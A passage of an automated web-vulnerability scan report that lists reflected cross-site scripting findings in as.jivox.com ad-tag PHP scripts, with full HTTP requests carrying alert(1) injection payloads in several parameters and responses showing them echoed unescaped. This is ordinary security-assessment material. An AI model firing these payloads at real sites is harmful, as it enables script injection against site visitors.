GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com91e52"-alert(1)-"5fe4b721423&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:50 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com91e52"-alert(1)-"5fe4b721423&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL=&jvxSessionId=1307963030.4011");
jvxAdPlayer.setP
...[SNIP]...

4.88. http://as.jivox.com/player/jivox_ad_tags.php [siteId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the siteId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 93237"-alert(1)-"1c0ac26dc9c was submitted in the siteId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d3737993237"-alert(1)-"1c0ac26dc9c&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:01 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d3737993237"-alert(1)-"1c0ac26dc9c&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1
...[SNIP]...

4.89. http://as.jivox.com/player/jivox_ad_tags.php [t parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d9e87"-alert(1)-"50c9a07e8ac was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856d9e87"-alert(1)-"50c9a07e8ac&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:29 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
w jivoxAdPlayer();
jvxAdPlayer.setPlayerWidth(300);
jvxAdPlayer.setPlayerHeight(250);
jvxAdPlayer.setServerURL("http://as.jivox.com");
jvxAdPlayer.setFlashVariables("t=1307962892856d9e87"-alert(1)-"50c9a07e8ac&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLj
...[SNIP]...

4.90. http://as.jivox.com/player/jivox_ad_tags.php [volume parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the volume request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 87dc8"-alert(1)-"89cb3bf5b3e was submitted in the volume parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=087dc8"-alert(1)-"89cb3bf5b3e&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:33 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
QkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=087dc8"-alert(1)-"89cb3bf5b3e&volumeInitAction=toggleMute&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-
...[SNIP]...

4.91. http://as.jivox.com/player/jivox_ad_tags.php [volumeInitAction parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /player/jivox_ad_tags.php

Issue detail

The value of the volumeInitAction request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 705a7"-alert(1)-"a39bde29291 was submitted in the volumeInitAction parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /player/jivox_ad_tags.php?t=1307962892856&r=0.9127810774371028&objectName=jvxAdPlayer&serverName=http://as.jivox.com&iframeTag=on&siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute705a7"-alert(1)-"a39bde29291&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.jpg&adVideoURL= HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://as.jivox.com/player/iabplayer.php?siteId=24bbcd13d37379&campaignId=19093&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aWkxdWFxcShnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkNEhVSk9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ/2/*http://www.quatros.com&mouseAction=mouseOver
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:03:37 GMT
Server: Apache/2.2.6 (Fedora)
Vary: Accept-Encoding,User-Agent
X-Powered-By: PHP/5.1.6
Content-Length: 57660
Connection: keep-alive

GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxAdPlayer(){
var clickThroughURL = "",

...[SNIP]...
lieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMWN0cXVhczQpKQ%2F2%2F%2Ahttp%3A%2F%2Fwww.quatros.com&mouseAction=mouseOver&autoPlay=true&maxAds=3&pauseBetweenAds=1000&volume=0&volumeInitAction=toggleMute705a7"-alert(1)-"a39bde29291&restartOnUnmute=1&jivoxBranded=false&serverURL=http://as.jivox.com&reportingURL=http%3A%2F%2Fevs.jivox.com&adThumbnail=http://jivoxuploads.s3.amazonaws.com/15976/11955-vid-1284509745-4c901031d728a-b.j
...[SNIP]...

4.92. http://as.jivox.com/unit/jivox_unit_tags.php [campaignId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the campaignId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1f8fd'%3balert(1)//af89749ee75 was submitted in the campaignId parameter. This input was echoed as 1f8fd';alert(1)//af89749ee75 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1&siteId=24bbcd13d37379&campaignId=196281f8fd'%3balert(1)//af89749ee75&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:31 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32442


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var
...[SNIP]...
<a href="http://as.jivox.com/player/proxy.php?campaignId=196281f8fd';alert(1)//af89749ee75&siteId=24bbcd13d37379&clickTagURL=http%3A%2F%2Fclicks.beap.ad.yieldmanager.net%2Fc%2FYnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2k
...[SNIP]...

4.93. http://as.jivox.com/unit/jivox_unit_tags.php [creativeUnitType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the creativeUnitType request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8862e'%3balert(1)//e96b38092f was submitted in the creativeUnitType parameter. This input was echoed as 8862e';alert(1)//e96b38092f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=18862e'%3balert(1)//e96b38092f&expandUnitType=1&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:28 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32370


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '18862e';alert(1)//e96b38092f';
    var expandUnitType = '1';    
    this.playBtnOrientation = 'right';
    var playBtnContainerInitHeight = ;
    var playBtnContainerInitWidth = ;
    this.playBtnContainerHeight = ;
    this.playBtnContainerW
...[SNIP]...

4.94. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the expandUnitType request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eabbc'%3balert(1)//3d9d7ab3ac4 was submitted in the expandUnitType parameter. This input was echoed as eabbc';alert(1)//3d9d7ab3ac4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1eabbc'%3balert(1)//3d9d7ab3ac4&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:29 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32481


GLOBAL_IBUSTER_CONTAINER_ZINDEX = (typeof(GLOBAL_IBUSTER_CONTAINER_ZINDEX) == "undefined") ? 999999 : GLOBAL_IBUSTER_CONTAINER_ZINDEX + 1;
function jivoxUnit(){
    var creativeUnitType = '1';
    var expandUnitType = '1eabbc';alert(1)//3d9d7ab3ac4';    
    this.playBtnOrientation = 'right';
    var playBtnContainerInitHeight = 90;
    var playBtnContainerInitWidth = 0;
    this.playBtnContainerHeight = 90;
    this.playBtnContainerWidth = 120;
        this.co
...[SNIP]...

4.95. http://as.jivox.com/unit/jivox_unit_tags.php [expandUnitType parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://as.jivox.com
Path:   /unit/jivox_unit_tags.php

Issue detail

The value of the expandUnitType request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f430e"%3balert(1)//86c1c56c0d3 was submitted in the expandUnitType parameter. This input was echoed as f430e";alert(1)//86c1c56c0d3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /unit/jivox_unit_tags.php?t=1307962878675&r=0.39272111374884844&objectName=jvxAdPlayer_894&creativeUnitType=1&expandUnitType=1f430e"%3balert(1)//86c1c56c0d3&siteId=24bbcd13d37379&campaignId=19628&clickTagURL=http://clicks.beap.ad.yieldmanager.net/c/YnY9MS4wLjAmYnM9KDE0aTJsZjFubyhnaWQkNzFhZjRhZGUtOTVhYy0xMWUwLTlmNWMtNmJlNGU4MGE0MDMxLHN0JDEzMDc5NjI4Njk1MzM2NjEsc2kkMjQ1MjU1MSx2JDEuMCxhaWQkUUY4SU9rd05qZUEtLGN0JDI1LHlieCRpVzhMNWhCSDQ4REtONDZRSGlCazd3LHIkMCxyZCQxMm1pbG1ibGMpKQ/2/*http://www.nealtire.com/&mouseAction=mouseOver HTTP/1.1
Host: as.jivox.com
Proxy-Connection: keep-alive
Referer: http://thesouthern.com/sports/basketball/article_c9733ff4-3bb8-56f0-83a0-e42a06ed2d38.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Mon, 13 Jun 2011 11:02:29 GMT
Server: Apache/2.2.6 (Fedora)
X-Powered-By: PHP/5.1.6
Connection: keep-alive
Content-Length: 32481


